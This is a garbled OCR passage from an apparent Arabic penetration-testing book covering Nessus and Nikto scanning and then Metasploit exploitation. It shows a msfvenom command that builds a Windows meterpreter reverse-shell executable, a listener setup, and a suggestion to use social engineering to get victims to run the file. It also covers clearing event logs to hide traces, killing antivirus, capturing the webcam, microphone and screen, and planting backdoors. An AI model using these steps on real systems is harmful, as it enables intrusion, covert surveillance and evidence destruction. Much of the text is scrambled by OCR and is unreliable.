قم بتحمیل Nessus free home versi0۸‏ من موقعه الرسمي 


http://www.nessus.org 
إذا كانت عملية البحث عن التغرات هي جزء من عملك أو كنت تريد القيام‎ 
بهذه العملية خارج شبكتك الشخصية فإنك بحاجة لشراء‎ 
ProfissionalFeed activation code 
بعد أن تقوم باختيار الإصدار المناسب لنظام التشغيل الخاص بك سيتم‎ 
إرسال كود التفعيل لك بواسطة الايميل ثم قم بإتباع الخطوات التالية:‎ 
root directory gû Nessus installer.deb )biaڊ‎ pã .\ 


.١‏ افتح التيرمينل وأكتب التعليمة التالية 
dpkg —i Nessus-5.2. 7-debian6G_amd64. deb‏ 
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قم باستبدال الاسم حسب اسم النسخة الخاصة بنظام التشفيل 
لديك. 


۳. قم بكتابة التعليمة التالية 
/etc/init. d/nessusd start‏ 


؛. اكتب العنوان التالي فى المتصفح للبدء بعملية الإعداد 
/https://127.0.0.1:8834‏ 


Welcome to Nessus® 5 


Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to perform: 


e High-speed vulnerability discovery, to determine which hosts are running which services 

e Agentless auditing, to make sure no host on your network is missing security patches 

e Compliance checks, to verify and prove that every host on your network adheres to the security policy you 
defined 

e Scan scheduling, to automatically run scans at the frequency you select 

e And more! 


During the next steps, we are going to create an administrative account and register your scanner with a Plugin Feed, 
which we will download. You will need an Activation Code before you can use Nessus; if you do not have an Activation 
Code already, please go to http://www.nessus. org/register/ to get one NOW. 


Get started > Click to switch to "Worksf 


administrator user jli مصã‎ .° 
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Username user1 
Password occ 
Confirm Password ee 


Administrator WV] 


Cancel 
HomeFeed ãةخwنil‎ Jيعفتll قم بإدخال کود‎ .٦ 


2gistration 


aw vulnerabilities is discovered and released into the public domain, Tenable's research staff 
ıgins") that enable Nessus to detect their presence. The plugins contain vulnerability 

1m to test for the presence of the security issue, and a set of remediation actions. To use 
ıbscribe to a "Plugin Feed" to obtain an Activation Code. 


ctivation Code 


` Activation Code: 


۷. قم بتسجيل الدخول باسم المستخدم الذي خلقته 
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Looking for the older Flash interface? 


tenable 


network security 


٠‏ يجب أن تستخدم كما" في عنوان ا۸ل من أجل الوصول إلى 
yoÎ gag Nessus server‏ إلزامي ليكون اتصال محمي. 

Nessus server "‏ يعمل على العنوان المحلي 127.0.0.1 وعلى 
البورت 8834 لذلك يجب عليك أن يكون 8834: هو جزء من عنوان 
URL‏ 

" تحميل ءہا-وںام usوومN‏ وعملية الاعداد الاولية سوف تأخذ من 
6-5 دقائق. 
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Nessus "‏ محجوب عن بعض الدول العربية مثل سوريا والسودان. 


:Nessus 


بعد أن تقوم بعملية تسجيل الدخول. أول مهمة هي تحديد ما هي 
الإضافات ء١-ودام‏ التي ستستخدمها في عملية الفحص. 


Nessus is fetching the newest plugin set 


Please wait... 


a 
The Nessus server is now downloading the nevrest plugins from Tenable vehich may teke some time as we're testing for ë lot of stuff, 


Then, the Nessus server will start processing the plugins, which is CPU / disk intensive and, therefore, takes a lot of time -- this is all part of the installation process. 
Once the plugins are downloaded and processed, subsequent startups will be much faster. 


Since this operation is taking some time, here are some useful links: 


Oocumentation: This page contains all of the manuals that you'll need to get the most out of Nessus and its features. 

Oiscusslon Forums: Oo you need some help or want to Interact with the Nessus community? This would be the place to go! 

Nessus Video Tutorials: Our YouTube channel contains a= lot of videos that vill help new Nessus users get started, and experienced users to discover new 
features. 

Support Portal: Manage your feed, open support tickets and get sample security policies (audit files). 

Tenable Blog: Contains dally posts about new features for all of our products: Nessus, SecurityCenter, the Log Correlation Engine (LCE), and the Passive 
Vulnerability Scanner (PVS). 

Mandatory Sales Pitch: Do you Intend to use Nessus to scan a large network? Take a look at Tenable SecurityCenter to see how you could leverage multiple 
scanners in your environment and share the results with the rest of your team. 

Tenable Podcast: Tenable regularly holds a podcast where we discuss about major security events of the week. 

Tuûtter: Yup, we're there too. 


Thanks again for Installing Nessus, and for your patience while the plugins are getting downloaded and processed. We hope you'll enjoy Nessus 5's new features! 


Good luck with the audit of your network! 


سوف نقوم بعملية فحص آمن على جهازنا المحلي وهذا يتضمن كل 
الإضافات كما-وںام المحددة ولكن لن نقوم بعملية استغلال فعلية. 


استعراض نتائج susیNe:‏ 


عندما تكتمل عملية الفحص يمكنك مشاهدة التقرير من خلال الضفغط 
على ioÛîlãة localhost check report jlıiilg Results‏ 
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N es S U S vulnerability scanner 


Results Seans Templates Policies Users Configuration 


ملخص التقرير يكون مرتب بحسب خطورة الثغرات, يمكنك التعرف أكثر 
على تفاصيل أي ثفرة من خلال الضغط المزدوج عليه 


Vulnerability Summary 


NOCUUHHHEORHHHHNE 
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kk 
Risk Factor: Crilical 


CVSS Base Score: 100 

CVSS Vector Score: CVSSZRAVNVAC LIAU:NVC CACIAVO 
CVSS Temporal Vectot: CVSS28E POCIRL :OFIRC:C 
CVSS Temporal Score: 7,8 


Vulnerability Information 


cPE: 
CPO O CADRONICOLUDUNbU_ INU: 1O. D4 tS COC JOCANONICADUbDUNDI_ RUC 104 Cpe odcanonicalubunbu_ limuocTf 110 


cpe #o0:canonical:iubunty_ Inu: 12.05 
Explolt Avallable: ue 

Exploktabillty Ease: Exploits are avaliable 
Patch Publication Date: 2012/07/12 

Ex plottable With: 


Metasplolt (Java Apptot Fleld Bytecode Verifier Cache Remole Code Execulon) 


Core Impact 


:Common Vulnerability and Exposures (CVE) 
هو فعرف خاص بالثغرات ويمكن أن يتم إرسال رقم الثغرة من‎ 
نتيجة البحث عن التغرات باستخدام usووه. إلى الميتاسبلويت‎ 
(الأداة المستخدمة في عملية الاستغلال, وسوف يتم‎ Metaspاoit‎ 
شرحها لاحقاً في هذا الكتاب)‎ 
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فعرف الثغرات ٥۷۴‏ مكون من العام الذي تم اكتشاف الثغرة به 


بالإضافة إلى رقم تعريفي فريد لكل ثفرة. 


للمزيد من المعلومات عن فعرف الثفرات C۷۴‏ من المواقع التالية: 


https://cve.mitre.org 


http://www.cvedetails.com 


:Nikto 
هو باحث عن التغرات مفتوح المصدر, يؤمن عملية فحص وبحث عن‎ 
التغرات خاصة بسيرفرات الويب. يقوم بعملية فحص ل‎ 


potentially dangerous files and scripts 6400 "= 
outdated server versions 1200 " 
version-specific problems on web server 300 " 


يمكنك تشغفيل ا)١‏ بشكل مباشر من خلال التيرمينل بدون الحاجة 
يمكنك تشغيل عملية الفحص ضد جهازك المحلي باستخدام التعليمة 
التالية 
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:~# nikto -h 127.0.0.1 


إن لم تقم بتحديد البورتات فإنه سيقوم بفحص 80٣٠م‏ بشكل افتراضي 


f HLKTO =H LA OO 
Nikto v2.1.6 


Target IP: 

Target Hostname : 

Target Port: 

Start Time: 2016-01-04 03:05:04 6M -5( 


Server: Apache/2.4.10 (Debian) 
Server leaks inodes via ETags, header found with file /, fields: Ox2b60 Qx51d 
0432 fb f100 
+ The anti-clickj acking X-Frame -Options header is not present . 
+ The X-XSS-Protection header is not defined. This header can hint to the user 
agent to protect against some forms of XSS 
+ The X-Content -Type-Options header is not set. This could allow the user agent 
to: render the content of the site in a different fashion to the MIME type 
+ No CGI Directories found (use '-C all' to force check all possible dirs) 
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12) . Ap 
che 2.0.65 (final release) and 2.2.29 are also current . 
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ /ffetc/hosts: The server install allows reading of any system file by adding 
an extra '/' to the URL. 
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appro 
priate line in the Apache conf file or restrict access to allowed sources. 
OSVDB-3233: /icons/README : Apache default file found. 
/server-status: Apache server-status interface found (pass protected) 
7517 requests: O error(s) and 10 item(s) reported on remote host 
End Time: 2016-01-04 03:05:15 )6GMT-5) (11 seconds) 


والنتيجة ستكون كالتالي: 


هم شيء في خرج ۸)٥‏ هو مدخلات (08۷08) 


ختبار اختراق سيرفرات وتطبيقات الويب ۳۳ 


Open Source Vulnerability Database 
:(OSVDB) 


تؤمن معلومات محددة عن الثفرات المكتشفة, هذه التعريفات تشبه 


.Nessus and Metasploit aJ laoدختسا تعریفات 6۷۴ التي يتم‎ 


0 هو مشروع مستقل ومفتوح المصدر هدفه تأمين معلومات 
تقنية عن أكثر من 90000 ثغرة مرتبطة بأكثر من 70000 منتج. 


يمكنك زيارة الموقع وءه.طلوه//:ما لمزيد من المعلومات. 


الاستعلال: 


هو المرحلة التي تأتي بعد كل عمليات جمع المعلومات وفحص البورتات 
والبحث عن التغرات ونحصل عندها على وصول غير مسموح به اتنفيذ 
کود عن بعد على الجهاز الهدف. 


أحد أهداف الاستغلال هو الحصول على صلاحيات المدير 
Administrative level rights‏ على الجھاز الھدف (سیرفر الویب) 


وعندها نستطيع التحكم بشكل كامل بالجهاز الهدف ويمكنا تنفيذ أي 
عمل بحرية مثل إضافة مستخدمين أو إضافة مدراء أو تنصيب أدوات 
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اختراق اضافية على جهاز الهدف أو إضافة كود لباب خلفي ٣oەك)عھط‏ 
الذي يسمح باستمرار الاتصال بالهدف. 


سوف نستخدم اأهامsهام"M‏ القيام بعملية الاستغلال. 


:Metasploit 
وهو اول أداة استغلال مفتوحة المصدر‎ exploitation framework هو‎ 
يؤمن هيكلية منظمة اعملية‎ Metaspاoit‎ Framework (MSF or ms) 
الاستغلال ويسمح للعامة باستخدام وتطوير ومشاركة الاستغلالات مع‎ 

عندما تفهم أساسیات "S۴‏ تصبح قادر استخدامه بفعالية خلال كل 

عمليات الاختراق بغض النظر عن النظام الهدف. 

Metasploit‏ هو فقط جزء من فصل في هذا الکتاب, یجب أن تمضي 

وقتاً أطول في المستقبل للتعرف والعمل على هذه الأداة الرائعة. 

قبل البدء في خطوات الاستغلال سوف أذكرك ببعض التعاريف المهمة: 

* التغرة رانااbدة٬م”ا۷u:‏ هي ضعف محتمل في النظام الهدف, 

ويمكن أن توجد بسبب عدم الترقيع ءام للعملية الضعيفة أو من 
خلال الاستخدام الخاطئ للغة التجميع مثل اه8 أو أي مشاکل 
محتملة أخرى يمكن أن تكون هدف للمهاجم. 
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٠‏ الاستغلال اأهام»×ه: هو الكود الذي يقوم بتسليم ۹ههارهم إلى 
النظام الهدف 

" dهoار۴a:‏ الهدف النهائي من عملية الاستغلال هو نتيجة تنفيذ 
الكود الخبيث على النظام الهدف. 
بعض sءلهaهاردم‏ تتضمن: 
Bind sheاا )cmd window)‏ في نظام ویندوز أو (امsh)‏ في 
نظام لینکس بالاضlفة‏ إJJ VNC injection gÎ reverse shell‏ 
التي تسمح بالتحكم بسطح المكتب عن بعد وإضافة مدير النظام 
الهدف. 


luluılٽ :Metasploit‏ 
بعض التعليمات الأساسية المستخدمة فى اهاامtasمm‏ 


:Searchn .‏ تستخدم للبحث عن الاستغلال في MSF,s database‏ 
بالاعتماد على V€ identifiers‏ الذي حصانا عليه في التقرير 
الخاص بنتائج .Nessus‏ 

CVE identifier J مئÛاloلl|l‎ Jلالغتسالا تستخدم لاختيار‎ :لءe‎ ." 

:Show Payload ."‏ تستخدم لاستعراض ءهھهارھم المتوفرة من 
أجل الاستغلال 

؛. oadاPay :Set‏ تستخدم لاختيار كةهارaم‏ المطلوب 
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:Show Options .°‏ تستخدم لاستعراض الخيارات الضرورية التي 
يجب إعدادها كجزء من ۹ههارهةم المختار. 

:Set Option ."‏ تستخدم لتخصيص قيمة لكل الخيارات الضرورية 

۷. اoiاExp:‏ تستخدم لإرسال الاستغلال إلى النظام الهدف. 


في البداية يجب أن تفتح Metasploit framework‏ ويتم ذلك بسهواة 
من خلال كتابة التعليمة 


:~# msfconsole 


سوف يأخذ عدة ثواتي ليقوم بتشغيل اأدامءها6" وخاصة عند أول مرة 
لذلك لا تكن قلق إذا لم يحدث شيء خلال هذه الدقائق, فقط انتظر. 
كل التعليمات التي سوف نستخدمها في هذا الفصل تتم في نافذة 


436 payloads - 37 encoders - 8 nops 
Free Metasploit Pro trial: http://r-7.co/trymsp 


| 1 ] 
1517 exploits - 871 auxiliary - 256 post ] 
] 
] 


sl mm Nr rer 


البحث هو المهمة الأولى التى يجب القيام بها لإيجاد الاستغلالات 


المتوفرة في ااهامsه†مN‏ والتي تتطابق مع CVE identifiers‏ التي تم 
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إيجادها خلال عملية البحث عن الثغرات باستخدام usوم.‏ أو پمكننا 
البحث باستخدام اسم الثغرات التي وجدناها في نتيجة ها)ن١‏ 


سوف نتعرف على الميتاسبلويت من خلال مثال عن عملية اختبار اختراق 
لنظام الويندوز (طريقة عمل الميتاسبلويت هي نفسها إن كانت 
لمهاجمة نظام الويندوز أو لمهاجمة سيرفر الويب والمختلف فقط هو 
نوع ۹ھoارهم‏ المستخدم) 

:Msfvenom 

remote shell öةديعب هو الکود الذي يقوم بخلق شيل‎ :shماا‎ code 
تتصل مع جهاز مختبر الاختراق.‎ 


مختبر الاختراق يقوم بخلق ملف خبيث يحوي على ءمهكهء ااماء ويقوم 
بإرساله إلى الهدف عبر الايميل أو بأي طريقة أخرى وعندما يقوم 
الهدف بفتح هذا الملف فإن مختبر الاختراق يمكنه الوصول إلى نظامه 
code‏ اامsh‏ يمكن أن تضاف أو تدمج مع ملف لبرنامجح شرعي من أجل 
فتح باب خلفي ٣مەل)ءةط‏ في الجهاز الهدف. 


مختبر الاختراق يستخدم ملف لبرنامج مشهور ويقوم بحقن أو دمج اامطء 
مەه في هذا البرنامح أو التطبيق وعندما يقوم الهدف بفتح هذا 
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الملف فإن مختبر الاختراق يمكنه الوصول والتحكم بجهاز الهدف من 


عن بعد. 


طريقة أخرى لاستخدام مكهء ااماء هي من خلال رفع شيل 4ههامں 
ااماء إلى موقع مصاب (يحوي على تغرات) وهذا يتم عندما يحوي 
سيرفر الويب على برامج تحوي على ثغرات أو عندما يكون الكود البرمجي 


Metasploit‏ سمح انا بخلق مكه» ااهطء والتي یمکن أن تستخدم من 
أجل اختبار الحماية في النظام الهدف. 


هذه العملية كانت تiüم‏ ڊiüwlخpl "msfpayload" and "msfencode"‏ 
ولكن هذه الأدوات تم استبدالها بأداة واحدة تقوم بنفس المهمة 


"msfvenon" yھg‎ 


:Msfvenom plaiiwl 


سوف نقوم بخلف ملف يحوي على ءهكهء اام۸ء باستخدام التعليمة 
msfven0m‏ وسوف نقوم بإعداد نظام الكالي من أجل أن يستطيع 
استقبال الاتصال القادم من الجهاز الهدف وإذا تمت هذه العملية بنجاح 
قسوف نحصل على جلسة من عن بعد ionییمء remote‏ مع جھاز 
الهدف. 
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الخطوات: 


من خلال الترمنيل سنكتب ااتعليمة "sfvenıom"‏ 


-' or stdin to use custom payloads 


all 


encoders, Nnops, 


Payload to use. Specify a 
List the payload's standard options 

List a module type. Options are: payloads, 
Prepend a nopsled of [length] size on to the payload 
Output format (use --help-formats for a list) 

List available formats 

The encoder to use 

The architecture to use 

The platform of the payload 

List available platforms 

The maximum size of the resulting payload 

The maximum size of the encoded payload (defaults to the 
The list of characters to avoid example: '\xOO\xff' 

The number of times to encode the payload 
Specify an additional win32 shellcode file to include 
Specify a custom executable file to use as a template 


Preserve the template behavior and inject the payload as a 


SEMER EN AE 

Specify a custom variable name to use for certain output 
Generate the smallest possible payload 

SAA EIEEEE 


<payload> 


:~# msfvenom 
Error: No options 
MsfVenom - a Metasploit standalone payload generator. 
Also a replacement for msfpayload and msfencode. 
Usage: /usr/bin/msfvenom [options] <var=val> 


--payload 


--payload-options 


[type] 
<length> 
<format> 


<encoder> 
<arch> 
<plat form> 


<length> 


--lİist 
--nopsled 

-- format 
--help- formats 
- -encoder 
--arch 
--platform 


--help-plat forms 


--space 


--encoder-space <length> 


<list> 
<count> 
<path> 
<path> 


<path> 
<name> 


--bad-chars 
--literations 
--add-code 
--template 
--keep 


- -OUt 
--var-name 
--smallest 
--help 


من أجل خلق ملف الشيل يجب أن نقوم بتحديد ك۹ھەارaم platform,‏ 


وبعض الخيارات الأخرى من أجل عملية التشفير 


Msfvenom‏ يدعم میزات معینة تساعد علی تجاوز مضادات الفیروسات 
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نتقو 


م بإضافة code‏ اامطء إلى ملف موجود مسبقاً. 


التعليمة التالية تستخدم من أجل رؤية كل sلههارهم‏ المتاحة: 
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msfvenom -| payloads 


بعض هذه ال sلههارةم‏ تقوم بمهام معينة مثل خلق مستخدم جديد 
وبعضها تقوم بعمل خطير وهدام "windows/format_all_drives" Ji‏ 


والتي تقوم بعملية فورمات لكل الأقراص الموجودة في جهاز الهدف. 


:Remote Metasploit Shell 
ساہلowسs لخلق شيل عكسية لمهاجمة جهاز يعمل بنظام التشغيل‎ 


ضوف شخذة 
Payload: "windows/meterpreter/reverse_tcp"‏ 

ويجب أن نقوم بضبط عنوان ۱۴ ورقم المنفذ ۴مم الخاصين بنظام 

الكالي. 

الشيل سوف يكون على شكل ملف تنفيذي (ه×ه.) 


خلق الشيل يتم من خلال التعليمة التالية: 

msfvenom -p windows/meterpreter/reverse_tcep LHOST=[Your 
Kali IP Address] LPORT=4444 -f exe > name.exe 

م-: من أجل تحديد كههارهم المستخدم 

1H07 & LPR‏ : من أجل تحدید عنوان ۱۴ للكالي ورقم المنفذ 

المستخدم في عملية الاتصال 

-: لتحديد نوع الملف (ملف تنفيذي) 
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<: من أجل تخزين مههء اامطء في ملف name.exe pwساJl al‏ 


:~# msfvenom -p windows/meterpreter/reverse tcp LHOST=172.16.2.100 LPORT=4444 
-f exe >aabb.exe 
No platform was selected, choosing Msf : :Module: :Plat form: :Wwindows from the payload 


No Arch selected, selecting Arch: x86 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 333 bytes 


يجب أن نقوم بنسخ الملف "ه×ه.ططهه" إلى الجهاز الهدف الذي يعمل 
ڊplbiم windows‏ 

طبعاً في عمليات الاختراق الحقيقية يتم استخدام إحدى طرق الهندسة 
الاجتماعية من أجل خداع الهدف ليقوم بفتح هذا الملف. 


سنقوم بفتح تيرمنيل جديدة وكتابة التعليمة "ءامئمهء۴و"" من أجل 
تشغيل انهامsه†Ne‏ وخلق ما١٣‏ من أجل الانصات للاتصال القادم. 


use exploilmulti/handler 

set payload windows/meterpreter/reverse_tcp 
set /port 4444 

set lhost [Your Kali IP Address] 

exploit 


xploit ( ) sS 
= 12 


set lport 4444 


exploit 


Handler failed to bind to 172.16.2.100:4444 
|] Started reverse handler on 0.0.0.0:4444 
] Starting the payload handler... 
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وعندما يتم فتح الملف م×ه.اةهة في نظام الویندوز سوف تبداً عملية 
الاتصال العكسي مع الجهاز الهدف وسوف نحصل على جلسة 
meterpreter‏ فعالة مع النظام الهدف. 


msf exploit ( J) > exploit 


[*] Started reverse handler on 172.16.2.100:4444 
“] Starting the payload handler... 
] Sending stage (957487 bytes) to 172.16.2.33 


5-12-28 11:35:43 -0 


التعليمة "مام" تقوم بعرض كل التعليمات المتاحة 
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Description 


Help menu 

Backgrounds the current session 

Kills a background meterpreter script 
Lists running background scripts 


Executes a meterpreter script as a background thread 


LEER els 


Displays information or control active channels 
Closes a channel 

Disables encoding of unicode strings 

Enables encoding of unicode strings 

Terminate the meterpreter session 

Get the current session timeout values 

Help menu 

Displays information about a Post module 

Drop into irb scripting mode 

Load one or more meterpreter extensions 

Get the MSF ID of the machine attached to the s 
Migrate the server to another process 

Terminate the meterpreter session 

Reads data from a channel 

Run the commands stored in a file 

Executes a meterpreter script or Post module 
Set the current session timeout values 


meterpreter > help 


Core Commands 


background 
bgkill 
bglist 

bgrun 
channel 
close 
disable_unicode_encoding 
enable_unicode_ encoding 
exit 
get_timeouts 
help 

info 

irb 

load 
machine_id 
migrate 

quit 

read 
resource 

run 
set_timeouts 


slee Force Meterpreter to go quiet, then re-establish session. 


:Meterpreter Shell 
تسمح انا بالقيام‎ Meterpreter Shell بعد نجاج عملية الاستغلال فإن‎ 


بالعديد من العمليات في جهاز الهدف. 


Meterpreter‏ هو أداة رائعة للتلاعب أو التحكم بالنظام الهدف من عن 


بعد وهو يحوي على مجموعة من التعليمات والأدوات مثل تعليمات 
سحب الهاش الخاص بكلمات السر وجمع البيانات الحساسة من النظام 


الهدف كما يمكننا تشغيل الكميرا والحصول على تسجيل فديو أو صور 
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بالإضافة إلى تشغيل المكيرفون وتسجيل الصوت والحصول على لقطات 


:Basic Meterpreter Commands 
البداية تكون مع جلسة فعالة مع النظام الهدف.‎ 


لمعرفة العمليات التي يمكن القيام بها يمكننا كتابة التعليمة: 


التعليمات موزعة ضمن تصنيفات: 
Core Commandse‏ 

File System Commands e 
Networking Commands e 
System Commands e 

User Interface Commands e 


Webcam Commands 
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:Core Commands 


meterpreter > help 


Core Commands 


Description 


Help menu 

Backgrounds the current session 

Kills a background meterpreter script 

Lists running background scripts 

Executes a meterpreter script as a background thread 
Displays information or control active channels 
Closes a channel 

Disables encoding of unicode strings 

Enables encoding of unicode strings 

Terminate the meterpreter session 

Get the current session timeout values 

Help menu 

Displays information about a Post module 

Drop into irb scripting mode 

Load one or more meterpreter extensions 

Get the MSF ID of the machine attached to the session 
Migrate the server to another process 

Terminate the meterpreter session 

Reads data from a channel 

Run the commands stored in a file 

Executes a meterpreter script or Post module 

Set the current session timeout values 

Force Meterpreter to go quiet, then re-establish session. 


background 
bgkill 
bglist 

bgrun 
channel 
close 
disable_unicode_encoding 
enable_unicode_encoding 
exit 
get_timeouts 
help 

info 

irb 

load 
machine_id 
migrate 

quit 

read 
resource 

run 
set_timeouts 
slee 


التعليمات التي يمكن استخدمها بدون صلاحيات عالية هى: 


" ac)kgroundط:‏ تجعل الجسلة تعمل بالخلفية وهذا يسمح انا 


بالعودة إلى امصm٥rام‏ وص من أجل تنفيذ تعليمات أخرى أو الوصول 


aeterpreter > background 


er 
Backgrounding session 1... 
e 


xploit ( 3 


إلى جلسات أخرى. 
يمكن العودة للجسلة من خلال استخدام التعليمة 
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session -i <session /D> 


Connect ion 


meterpreter x86/win32 ISC-A-PO\isc-sa @ ISC-A-PC 172.16.2.100:4444 -=> 1 
18.2-94) 


xploit ( J) > sessions -İi 1 
tarting interaction with 1... 


meterpreter > J 


and run "‏ adدا:‏ هذہ التعليمات تسمح لنا باستخدام وحدات 
وتعلیمات |ضlفية Meterpreter Jil‏ 


Meterpreter jo چgjill‎ :exit " 
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:File System Commands 


بعد الحصول على اامطء Meterpreter‏ يمكننا التعامل مع ملفات النظام 


الهدف باستخدام هذه التعليمات 


Read the contents of a file to the screen 
Change directory 

Download a file or directory 

Edit a file 

Print local working directory 

Print working directory 

Change local working directory 

Print local working directory 

List files 

Make directory 

Move source to destination 

Print working directory 

Delete the specified file 

Remove directory 

Search for files 

List all mount points/logical drives 
Upload a file or directory 


cd 
download 
edit 


get lwd 
getwd 
lcd 


lpwd 
1s 
mkdi r 
mv 

pwd 

rm 
rmdir 
search 


show_ mount 


upload 


بشكل عام يمكننا استخدام تعليمات نظام لينكس للتعامل مع الملفات 


في النظام الهدف. 


:cat‏ عرض محتویى ملف. 
" هع: تغيير المجلد. 
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" oadاownل:‏ تحمیل ملف او مجلد. 

ditه:‏ تعديل ملف. 

" dساtهو:‏ عرض المسار الحالي في نظام الكالي. 
١‏ لعا: تغيير المسار الحالي في نظام الكالي. 
كا: عرض محتوى المجلد الحالي. 

" k)dirص:‏ إنشاء مجلد. 

" كسم: عرض المسار الحالي في النظام الهدف. 
١‏ ۴۳: حذف ملف معين. 

٭ ٣أdصم:‏ حذف مجلد معین. 

" archعء:‏ البحث عن ملف معين. 

zû) :upload "‏ ملف أو مجلد. 


:Network Commands 


Display the host ARP cache 


Display the current proxy configuration 
Display interfaces 

Display interfaces 

Display the network connections 

Forward a local port to a remote service 
View and modify the routing table 
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getp roxy 
ifconfig 
ipconfig 
netstat 

port fwd 

route 


ipconfig "‏ & وfconfiا:‏ عرض معلومات كروت الشبكة في الجهاز 


الهدف. 
" tهtstهم:‏ عرض قائمة بالاتصالات النشطة. 


route "‏ & ortfwdم:‏ تسمح لنا بالقیام بهجمات ضد الأجهزة 


الموجودة في شبكة النظام الهدف. 


:System Commands 


Clear the event log 

Relinquishes any active impersonation token. 

Execute a command 

Get one or more environment variable values 

Get the current process identifier 

Attempt to enable all privileges available to the current process 


Get the SID of the user that the server is running as 
Get the user that the server is running as 

Terminate a process 

List running processes 

Reboots the remote computer 

Modify and interact with the remote registry 

Calls RevertToSelf() on the remote machine 

Drop into a system command shell 

Shuts down the remote computer 

Attempts to steal an impersonation token from the target proce 
Suspends or resumes a list of processes 

Gets information about the remote system, such as OS 


" تا"nاsرء:‏ تقوم بعرض معلومات عن الجهاز الهدف. 


clearev 
drop_token 
execute 
getenv 
getpid 
getprivs 
getsid 
getuid 
kill 

ps 

reboot 

reg 
rev2sel f 
shell 

shut down 
steal_token 
suspend 
sysinfo 


" arevماc:‏ تقوم بمحاولة مسح السجلات في النظام الهدف. 
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يجب أن نقوم بمسح سجلات النظام في النظام الهدف لإخفاء 
الآثار والعمليات التي قمنا بها 


يمكن رؤية هذه السجلات في s7سowلہاw‏ 


Î Event Viewer (Local Security Number of events: 4,151 


$ Custom Views 


4 U Windows Logs Keywor... Date and Tıme Source Event IL * 
WÎ Application A Audi... 10/22/2013 806:28 AM Micros... 467: 
[A] Security @ Audi... 10/22/2013 806:28 AM Micros. 4624 
FE] Setup @, Audi... 10/22/2013 806:28 AM Micros... 4644 
Î System @, Audi... 10/22/2013 802:28 AM Micros. 4677 
E] Forwarded Events €, Audi... 10/22/2013 802:28 AM Micros... 4624 
E) Applications ond Services Lol jj @, Audi... 10/22/2013 802:25 AM Micros... 4672 
„% Subscriptions @\ Audi... 10/22/2013 802:25 AM Micros... 4624 
@ Audi... 10/22/2013 800:26 AM Mieros., 461€ 
@l, Audi... 10/22/2013 800:23 AM Micros... 24 
@, Audi... 10/22/2013 800:19 AM Micros. 5024 
@ ûudi 1A MIAN AMA is A33 


هذه السجلات يمكن أن تحوي على العمليات التي قمنا بها في النظام 
الهدف ويجب أن نقوم بمسحها من خلال التعليمة التالية: 
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Arch Session 


[System Process] 
System 

SEE ERG 
csrss.exe 
wininit .exe 


CSFSS.CeXe 


services .exe 
lsass.exe 
lsm.exe 
winlogon.exe 
svchost .exe 
svchost .exe 
vsserv.exe 
chrome .exe 
ogle\Chrome\Application\chrome .exe 
1124 66 svchost . 
1184 636 svchost . 
1212 636 svchost . 
1236 66 svchost . 
1380 636 svchost . 


١‏ كم: تعرض قائمة بالعمليات التي تعمل فى النظام الهدف. 


هذه المعلومات مفيدة عندما نريد نقل الشيل من عملية ذات صلاحيات 
منخفضة إلى عملية ذات صلاحيات عالية. 


تتم عملية النقل باستخدام التعليمة "٠٣وا"‏ متبوعة برقم العملية 
المراد الانتقال لها 
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at ing 
tion completed 


> getpid 


كما يمكن الاستفادة من هذه التعليمة لإيقاف مضاد الفيروسات في 
الجهاز الهدف من خلال استخدام التعليمة "ااام" متبوعة برقم عملية 
مضاد الفيروسات. 


إلتقاط صور وتسجيل فديو ومقاطع صوت: 


:webcam video "‏ 
التعليمة التالية تظهر الخيارات المتاحة: 


run webcam -h 


meterpreter > run webcam -h 
webcam -- view webcam over session 


OPTIONS: 


-@ Store copies of all the images capture instead of overwriting the same file (Defaul 
: overwrite single file) 

-d <opt> Loop delay interval (in ms, default 1000) 

-f Just grab single frame 


-g Send to GUI instead of writing to file 

-h Help menu 

1 The index of the webcam to use (Default: 1) 

- Keep capturing in a loop (default) 

20 The path to the folder images will be saved in (Default: current working directory) 
-q The JPEG image quality (Default: 50) 

-s Stop recording 
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:screenshots " 


"preter > screenshot 


Screenshot saved to: /root/rstyzCsF . jpeg 
:sound recording " 


التعليمة التالية تعرض الخيارات المتاحة 


meterpreter > run sound_recorder -h 
Meterpreter Script for recording in intervals the sound capture by a target host microphone. 


OPTIONS: 


-h Help menu. 
-i <opt> Number of 30 second intervals to record. 
-l <opt> Specify a alternate folder to save sound files to. 


run sound_recored -h 


من أجل تسجيل الصوت لمدة 30 ثانية نقوم باستخدام التعليمة بدون أى 
خیارات 


:Running Scripts 

يوجد في Meterpreter‏ Îكûر‏ من 200 ءام‌اءءء والتي يمكن أن تستخدم 
بعد عملية الاستغلال. 

لعرض كل السكريبتات الموجودة من خلال التعليمة التالية: 


run <tab><tab> 


meterpreter > run 
Display all 252 possibilities? (y or n) 
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:Remote Shell 


يمكن الحصول عليها باستخدام التعليمة 


meterpreter > shell 
Process 5320 created. 
Channel 1 created. 


Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\isc -sa\Downloads\P roqgr 


الآن يمكننا استخدام تعليمات 008 على النظام الهدف 
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المحافظة على الوصول: 


عندما يصبح مختبر الاختراق قادرا على الوصول للنظام الهدف فإنه يقوم 
بزرع باب خلفي ٥۴‏ هه )عوط ليتمكن من التحكم بشكل كامل بالجهاز 
الضحية والعودة إليه متى يشاء بدون القيام بعملية الاستغلال مرة 
عملية تثبيت الوصول تسمح لنا بالوصول للنظام الهدف بأوقات أخرى 
مستقبلاً وهذا يتم من خلال الأمور التالية: 

٭ خلق مستخدم جدید. 


١‏ خلق سماحيات للوصول من خلال المشاركة. 


* تفعیل بعض الخدمات مثل (۴۳۴). 


١‏ ضبط أو تغير الصلاحيات. 
خلق باب خلفي .backdoor‏ 


ريما تكون الأداة الأكثر استخداماً خلال عملية استمرارية الوصول هى 
Netcat‏ هذه الذّداة تسمی سکین الجیش السویسري وغالباً ما تکون 
أول أداة يتم تنصيبها بعد استغلال النظام الهدف لأن المهاجم 
يستطيع الحفر عميقاً في الشبكة ويحاول استغلال أجهزة إضافية من 
خلال ما يسمى التمحور و١ااه۷ام‏ والذي يعني استخدام الجهاز 
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المستفل حالياً لمهاجمة أجهزة إضافية أخرى في الشبكة الداخلية, 
هناك مثال عن استخدام ٤ء۸6‏ في فصل لاحق في هذا الكتاب 


:Webacoo 


هذه الأداة تقوم بخلق ٣ممل)ءدط‏ وتسمح لنا بالاتصال بالسيرفر 
